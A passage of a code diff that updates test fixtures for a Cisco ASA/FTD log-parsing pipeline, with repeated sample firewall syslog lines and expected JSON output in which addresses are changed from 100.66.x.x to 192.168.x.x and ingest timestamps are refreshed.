by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] diff --git a/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-asa.log-expected.json b/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-asa.log-expected.json index d399a8db27c..f3f42c70e51 100644 --- a/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-asa.log-expected.json +++ b/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-asa.log-expected.json @@ -10,8 +10,8 @@ }, "destination": { "port": 8256, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1772, @@ -51,7 +51,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -59,8 +59,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:25.094745429Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1772 to outside:100.66.98.44/8256", + "ingested": "2021-12-09T13:32:20.603706900Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1772 to outside:192.168.98.44/8256", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -93,8 +93,8 @@ }, "source": { "port": 80, - "address": "100.66.205.104", - "ip": "100.66.205.104" + "address": "192.168.205.104", + "ip": "192.168.205.104" }, "tags": [ "preserve_original_event" @@ -129,7 +129,7 @@ "localhost" ], "ip": [ - "100.66.205.104", + "192.168.205.104", "172.31.98.44" ] }, @@ -138,8 +138,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:25.094751156Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11757 for outside:100.66.205.104/80 (100.66.205.104/80) to inside:172.31.98.44/1772 (172.31.98.44/1772)", + "ingested": "2021-12-09T13:32:20.603715500Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11757 for outside:192.168.205.104/80 (192.168.205.104/80) to inside:172.31.98.44/1772 (172.31.98.44/1772)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -155,7 +155,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.205.104", + "mapped_source_ip": "192.168.205.104", "connection_id": "11757", "source_interface": "outside", "mapped_destination_port": 1772 @@ -177,8 +177,8 @@ }, "source": { "port": 80, - "address": "100.66.211.242", - "ip": "100.66.211.242" + "address": "192.168.211.242", + "ip": "192.168.211.242" }, "tags": [ "preserve_original_event" @@ -213,7 +213,7 @@ "localhost" ], "ip": [ - "100.66.211.242", + "192.168.211.242", "172.31.98.44" ] }, @@ -224,8 +224,8 @@ "severity": 6, "duration": 67000000000, "reason": "TCP Reset-I", - "ingested": "2021-07-19T09:06:25.094753243Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11749 for outside:100.66.211.242/80 to inside:172.31.98.44/1758 duration 0:01:07 bytes 38110 TCP Reset-I", + "ingested": "2021-12-09T13:32:20.603721500Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11749 for outside:192.168.211.242/80 to inside:172.31.98.44/1758 duration 0:01:07 bytes 38110 TCP Reset-I", "code": "302014", "kind": "event", "start": "2018-10-10T12:33:49.000Z", @@ -262,8 +262,8 @@ }, "source": { "port": 80, - "address": "100.66.211.242", - "ip": "100.66.211.242" + "address": "192.168.211.242", + "ip": "192.168.211.242" }, "tags": [ "preserve_original_event" @@ -298,7 +298,7 @@ "localhost" ], "ip": [ - "100.66.211.242", + "192.168.211.242", "172.31.98.44" ] }, @@ -309,8 +309,8 @@ "severity": 6, "duration": 67000000000, "reason": "TCP Reset-I", - "ingested": "2021-07-19T09:06:25.094755060Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11748 for outside:100.66.211.242/80 to inside:172.31.98.44/1757 duration 0:01:07 bytes 44010 TCP Reset-I", + "ingested": "2021-12-09T13:32:20.603727400Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11748 for outside:192.168.211.242/80 to inside:172.31.98.44/1757 duration 0:01:07 bytes 44010 TCP Reset-I", "code": "302014", "kind": "event", "start": "2018-10-10T12:33:49.000Z", @@ -347,8 +347,8 @@ }, "source": { "port": 80, - "address": "100.66.185.90", - "ip": "100.66.185.90" + "address": "192.168.185.90", + "ip": "192.168.185.90" }, "tags": [ "preserve_original_event" @@ -383,7 +383,7 @@ "localhost" ], "ip": [ - "100.66.185.90", + "192.168.185.90", "172.31.98.44" ] }, @@ -394,8 +394,8 @@ "severity": 6, "duration": 67000000000, "reason": "TCP Reset-I", - "ingested": "2021-07-19T09:06:25.094756847Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11745 for outside:100.66.185.90/80 to inside:172.31.98.44/1755 duration 0:01:07 bytes 7652 TCP Reset-I", + "ingested": "2021-12-09T13:32:20.603733100Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11745 for outside:192.168.185.90/80 to inside:172.31.98.44/1755 duration 0:01:07 bytes 7652 TCP Reset-I", "code": "302014", "kind": "event", "start": "2018-10-10T12:33:49.000Z", @@ -432,8 +432,8 @@ }, "source": { "port": 80, - "address": "100.66.185.90", - "ip": "100.66.185.90" + "address": "192.168.185.90", + "ip": "192.168.185.90" }, "tags": [ "preserve_original_event" @@ -468,7 +468,7 @@ "localhost" ], "ip": [ - "100.66.185.90", + "192.168.185.90", "172.31.98.44" ] }, @@ -479,8 +479,8 @@ "severity": 6, "duration": 67000000000, "reason": "TCP Reset-I", - "ingested": "2021-07-19T09:06:25.094759636Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11744 for outside:100.66.185.90/80 to inside:172.31.98.44/1754 duration 0:01:07 bytes 7062 TCP Reset-I", + "ingested": "2021-12-09T13:32:20.603738900Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11744 for outside:192.168.185.90/80 to inside:172.31.98.44/1754 duration 0:01:07 bytes 7062 TCP Reset-I", "code": "302014", "kind": "event", "start": "2018-10-10T12:33:49.000Z", @@ -517,8 +517,8 @@ }, "source": { "port": 80, - "address": "100.66.160.197", - "ip": "100.66.160.197" + "address": "192.168.160.197", + "ip": "192.168.160.197" }, "tags": [ "preserve_original_event" @@ -553,7 +553,7 @@ "localhost" ], "ip": [ - "100.66.160.197", + "192.168.160.197", "172.31.98.44" ] }, @@ -564,8 +564,8 @@ "severity": 6, "duration": 68000000000, "reason": "TCP Reset-I", - "ingested": "2021-07-19T09:06:25.094761597Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11742 for outside:100.66.160.197/80 to inside:172.31.98.44/1752 duration 0:01:08 bytes 5738 TCP Reset-I", + "ingested": "2021-12-09T13:32:20.603744600Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11742 for outside:192.168.160.197/80 to inside:172.31.98.44/1752 duration 0:01:08 bytes 5738 TCP Reset-I", "code": "302014", "kind": "event", "start": "2018-10-10T12:33:48.000Z", @@ -602,8 +602,8 @@ }, "source": { "port": 80, - "address": "100.66.205.14", - "ip": "100.66.205.14" + "address": "192.168.205.14", + "ip": "192.168.205.14" }, "tags": [ "preserve_original_event" @@ -638,7 +638,7 @@ "localhost" ], "ip": [ - "100.66.205.14", + "192.168.205.14", "172.31.98.44" ] }, @@ -649,8 +649,8 @@ "severity": 6, "duration": 68000000000, "reason": "TCP Reset-I", - "ingested": "2021-07-19T09:06:25.094763317Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11738 for outside:100.66.205.14/80 to inside:172.31.98.44/1749 duration 0:01:08 bytes 4176 TCP Reset-I", + "ingested": "2021-12-09T13:32:20.603750400Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11738 for outside:192.168.205.14/80 to inside:172.31.98.44/1749 duration 0:01:08 bytes 4176 TCP Reset-I", "code": "302014", "kind": "event", "start": "2018-10-10T12:33:48.000Z", @@ -687,8 +687,8 @@ }, "source": { "port": 80, - "address": "100.66.124.33", - "ip": "100.66.124.33" + "address": "192.168.124.33", + "ip": "192.168.124.33" }, "tags": [ "preserve_original_event" @@ -723,7 +723,7 @@ "localhost" ], "ip": [ - "100.66.124.33", + "192.168.124.33", "172.31.98.44" ] }, @@ -734,8 +734,8 @@ "severity": 6, "duration": 68000000000, "reason": "TCP Reset-I", - "ingested": "2021-07-19T09:06:25.094765076Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11739 for outside:100.66.124.33/80 to inside:172.31.98.44/1750 duration 0:01:08 bytes 1715 TCP Reset-I", + "ingested": "2021-12-09T13:32:20.603756200Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11739 for outside:192.168.124.33/80 to inside:172.31.98.44/1750 duration 0:01:08 bytes 1715 TCP Reset-I", "code": "302014", "kind": "event", "start": "2018-10-10T12:33:48.000Z", @@ -772,8 +772,8 @@ }, "source": { "port": 80, - "address": "100.66.35.9", - "ip": "100.66.35.9" + "address": "192.168.35.9", + "ip": "192.168.35.9" }, "tags": [ "preserve_original_event" @@ -808,7 +808,7 @@ "localhost" ], "ip": [ - "100.66.35.9", + "192.168.35.9", "172.31.98.44" ] }, @@ -819,8 +819,8 @@ "severity": 6, "duration": 69000000000, "reason": "TCP Reset-I", - "ingested": "2021-07-19T09:06:25.094766798Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11731 for outside:100.66.35.9/80 to inside:172.31.98.44/1747 duration 0:01:09 bytes 45595 TCP Reset-I", + "ingested": "2021-12-09T13:32:20.603762100Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11731 for outside:192.168.35.9/80 to inside:172.31.98.44/1747 duration 0:01:09 bytes 45595 TCP Reset-I", "code": "302014", "kind": "event", "start": "2018-10-10T12:33:47.000Z", @@ -857,8 +857,8 @@ }, "source": { "port": 80, - "address": "100.66.211.242", - "ip": "100.66.211.242" + "address": "192.168.211.242", + "ip": "192.168.211.242" }, "tags": [ "preserve_original_event" @@ -893,7 +893,7 @@ "localhost" ], "ip": [ - "100.66.211.242", + "192.168.211.242", "172.31.98.44" ] }, @@ -904,8 +904,8 @@ "severity": 6, "duration": 69000000000, "reason": "TCP Reset-I", - "ingested": "2021-07-19T09:06:25.094768669Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11723 for outside:100.66.211.242/80 to inside:172.31.98.44/1742 duration 0:01:09 bytes 27359 TCP Reset-I", + "ingested": "2021-12-09T13:32:20.603767900Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11723 for outside:192.168.211.242/80 to inside:172.31.98.44/1742 duration 0:01:09 bytes 27359 TCP Reset-I", "code": "302014", "kind": "event", "start": "2018-10-10T12:33:47.000Z", @@ -942,8 +942,8 @@ }, "source": { "port": 80, - "address": "100.66.218.21", - "ip": "100.66.218.21" + "address": "192.168.218.21", + "ip": "192.168.218.21" }, "tags": [ "preserve_original_event" @@ -978,7 +978,7 @@ "localhost" ], "ip": [ - "100.66.218.21", + "192.168.218.21", "172.31.98.44" ] }, @@ -989,8 +989,8 @@ "severity": 6, "duration": 69000000000, "reason": "TCP Reset-I", - "ingested": "2021-07-19T09:06:25.094770817Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11715 for outside:100.66.218.21/80 to inside:172.31.98.44/1741 duration 0:01:09 bytes 4457 TCP Reset-I", + "ingested": "2021-12-09T13:32:20.603774Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11715 for outside:192.168.218.21/80 to inside:172.31.98.44/1741 duration 0:01:09 bytes 4457 TCP Reset-I", "code": "302014", "kind": "event", "start": "2018-10-10T12:33:47.000Z", @@ -1027,8 +1027,8 @@ }, "source": { "port": 80, - "address": "100.66.198.27", - "ip": "100.66.198.27" + "address": "192.168.198.27", + "ip": "192.168.198.27" }, "tags": [ "preserve_original_event" @@ -1063,7 +1063,7 @@ "localhost" ], "ip": [ - "100.66.198.27", + "192.168.198.27", "172.31.98.44" ] }, @@ -1074,8 +1074,8 @@ "severity": 6, "duration": 69000000000, "reason": "TCP Reset-I", - "ingested": "2021-07-19T09:06:25.094772560Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11711 for outside:100.66.198.27/80 to inside:172.31.98.44/1739 duration 0:01:09 bytes 26709 TCP Reset-I", + "ingested": "2021-12-09T13:32:20.603779900Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11711 for outside:192.168.198.27/80 to inside:172.31.98.44/1739 duration 0:01:09 bytes 26709 TCP Reset-I", "code": "302014", "kind": "event", "start": "2018-10-10T12:33:47.000Z", @@ -1112,8 +1112,8 @@ }, "source": { "port": 80, - "address": "100.66.198.27", - "ip": "100.66.198.27" + "address": "192.168.198.27", + "ip": "192.168.198.27" }, "tags": [ "preserve_original_event" @@ -1148,7 +1148,7 @@ "localhost" ], "ip": [ - "100.66.198.27", + "192.168.198.27", "172.31.98.44" ] }, @@ -1159,8 +1159,8 @@ "severity": 6, "duration": 69000000000, "reason": "TCP Reset-I", - "ingested": "2021-07-19T09:06:25.094774295Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11712 for outside:100.66.198.27/80 to inside:172.31.98.44/1740 duration 0:01:09 bytes 22097 TCP Reset-I", + "ingested": "2021-12-09T13:32:20.603824200Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11712 for outside:192.168.198.27/80 to inside:172.31.98.44/1740 duration 0:01:09 bytes 22097 TCP Reset-I", "code": "302014", "kind": "event", "start": "2018-10-10T12:33:47.000Z", @@ -1197,8 +1197,8 @@ }, "source": { "port": 80, - "address": "100.66.202.211", - "ip": "100.66.202.211" + "address": "192.168.202.211", + "ip": "192.168.202.211" }, "tags": [ "preserve_original_event" @@ -1233,7 +1233,7 @@ "localhost" ], "ip": [ - "100.66.202.211", + "192.168.202.211", "172.31.98.44" ] }, @@ -1244,8 +1244,8 @@ "severity": 6, "duration": 70000000000, "reason": "TCP Reset-I", - "ingested": "2021-07-19T09:06:25.094776017Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11708 for outside:100.66.202.211/80 to inside:172.31.98.44/1738 duration 0:01:10 bytes 2209 TCP Reset-I", + "ingested": "2021-12-09T13:32:20.603829500Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11708 for outside:192.168.202.211/80 to inside:172.31.98.44/1738 duration 0:01:10 bytes 2209 TCP Reset-I", "code": "302014", "kind": "event", "start": "2018-10-10T12:33:46.000Z", @@ -1282,8 +1282,8 @@ }, "source": { "port": 80, - "address": "100.66.124.15", - "ip": "100.66.124.15" + "address": "192.168.124.15", + "ip": "192.168.124.15" }, "tags": [ "preserve_original_event" @@ -1318,7 +1318,7 @@ "localhost" ], "ip": [ - "100.66.124.15", + "192.168.124.15", "172.31.98.44" ] }, @@ -1329,8 +1329,8 @@ "severity": 6, "duration": 67000000000, "reason": "TCP Reset-I", - "ingested": "2021-07-19T09:06:25.094777782Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11746 for outside:100.66.124.15/80 to inside:172.31.98.44/1756 duration 0:01:07 bytes 10404 TCP Reset-I", + "ingested": "2021-12-09T13:32:20.603835800Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11746 for outside:192.168.124.15/80 to inside:172.31.98.44/1756 duration 0:01:07 bytes 10404 TCP Reset-I", "code": "302014", "kind": "event", "start": "2018-10-10T12:33:49.000Z", @@ -1367,8 +1367,8 @@ }, "source": { "port": 80, - "address": "100.66.124.15", - "ip": "100.66.124.15" + "address": "192.168.124.15", + "ip": "192.168.124.15" }, "tags": [ "preserve_original_event" @@ -1403,7 +1403,7 @@ "localhost" ], "ip": [ - "100.66.124.15", + "192.168.124.15", "172.31.98.44" ] }, @@ -1414,8 +1414,8 @@ "severity": 6, "duration": 70000000000, "reason": "TCP Reset-I", - "ingested": "2021-07-19T09:06:25.094779735Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11706 for outside:100.66.124.15/80 to inside:172.31.98.44/1737 duration 0:01:10 bytes 123694 TCP Reset-I", + "ingested": "2021-12-09T13:32:20.603839700Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11706 for outside:192.168.124.15/80 to inside:172.31.98.44/1737 duration 0:01:10 bytes 123694 TCP Reset-I", "code": "302014", "kind": "event", "start": "2018-10-10T12:33:46.000Z", @@ -1452,8 +1452,8 @@ }, "source": { "port": 80, - "address": "100.66.209.247", - "ip": "100.66.209.247" + "address": "192.168.209.247", + "ip": "192.168.209.247" }, "tags": [ "preserve_original_event" @@ -1488,7 +1488,7 @@ "localhost" ], "ip": [ - "100.66.209.247", + "192.168.209.247", "172.31.98.44" ] }, @@ -1499,8 +1499,8 @@ "severity": 6, "duration": 71000000000, "reason": "TCP Reset-I", - "ingested": "2021-07-19T09:06:25.094781472Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11702 for outside:100.66.209.247/80 to inside:172.31.98.44/1736 duration 0:01:11 bytes 35835 TCP Reset-I", + "ingested": "2021-12-09T13:32:20.603843800Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11702 for outside:192.168.209.247/80 to inside:172.31.98.44/1736 duration 0:01:11 bytes 35835 TCP Reset-I", "code": "302014", "kind": "event", "start": "2018-10-10T12:33:45.000Z", @@ -1537,8 +1537,8 @@ }, "source": { "port": 80, - "address": "100.66.35.162", - "ip": "100.66.35.162" + "address": "192.168.35.162", + "ip": "192.168.35.162" }, "tags": [ "preserve_original_event" @@ -1573,7 +1573,7 @@ "localhost" ], "ip": [ - "100.66.35.162", + "192.168.35.162", "172.31.98.44" ] }, @@ -1584,8 +1584,8 @@ "severity": 6, "duration": 30000000000, "reason": "SYN Timeout", - "ingested": "2021-07-19T09:06:25.094783210Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11753 for outside:100.66.35.162/80 to inside:172.31.98.44/1765 duration 0:00:30 bytes 0 SYN Timeout", + "ingested": "2021-12-09T13:32:20.603847300Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11753 for outside:192.168.35.162/80 to inside:172.31.98.44/1765 duration 0:00:30 bytes 0 SYN Timeout", "code": "302014", "kind": "event", "start": "2018-10-10T12:34:26.000Z", @@ -1617,8 +1617,8 @@ }, "destination": { "port": 1188, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 56132, @@ -1658,7 +1658,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -1666,8 +1666,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:25.094784960Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic UDP translation from inside:172.31.98.44/56132 to outside:100.66.98.44/1188", + "ingested": "2021-12-09T13:32:20.603851800Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic UDP translation from inside:172.31.98.44/56132 to outside:192.168.98.44/1188", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -1700,8 +1700,8 @@ }, "source": { "port": 53, - "address": "100.66.80.32", - "ip": "100.66.80.32" + "address": "192.168.80.32", + "ip": "192.168.80.32" }, "tags": [ "preserve_original_event" @@ -1736,7 +1736,7 @@ "localhost" ], "ip": [ - "100.66.80.32", + "192.168.80.32", "172.31.98.44" ] }, @@ -1745,8 +1745,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:25.094786730Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11758 for outside:100.66.80.32/53 (100.66.80.32/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", + "ingested": "2021-12-09T13:32:20.603857600Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11758 for outside:192.168.80.32/53 (192.168.80.32/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", "action": "firewall-rule", @@ -1762,7 +1762,7 @@ "destination_interface": "inside", "mapped_source_port": 53, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.80.32", + "mapped_source_ip": "192.168.80.32", "connection_id": "11758", "source_interface": "outside", "mapped_destination_port": 56132 @@ -1784,8 +1784,8 @@ }, "source": { "port": 53, - "address": "100.66.80.32", - "ip": "100.66.80.32" + "address": "192.168.80.32", + "ip": "192.168.80.32" }, "tags": [ "preserve_original_event" @@ -1820,7 +1820,7 @@ "localhost" ], "ip": [ - "100.66.80.32", + "192.168.80.32", "172.31.98.44" ] }, @@ -1830,8 +1830,8 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-07-19T09:06:25.094788478Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11758 for outside:100.66.80.32/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 148", + "ingested": "2021-12-09T13:32:20.603862600Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11758 for outside:192.168.80.32/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 148", "code": "302016", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -1868,8 +1868,8 @@ }, "source": { "port": 53, - "address": "100.66.252.6", - "ip": "100.66.252.6" + "address": "192.168.252.6", + "ip": "192.168.252.6" }, "tags": [ "preserve_original_event" @@ -1904,7 +1904,7 @@ "localhost" ], "ip": [ - "100.66.252.6", + "192.168.252.6", "172.31.98.44" ] }, @@ -1913,8 +1913,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:25.094790183Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11759 for outside:100.66.252.6/53 (100.66.252.6/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", + "ingested": "2021-12-09T13:32:20.603868400Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11759 for outside:192.168.252.6/53 (192.168.252.6/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": 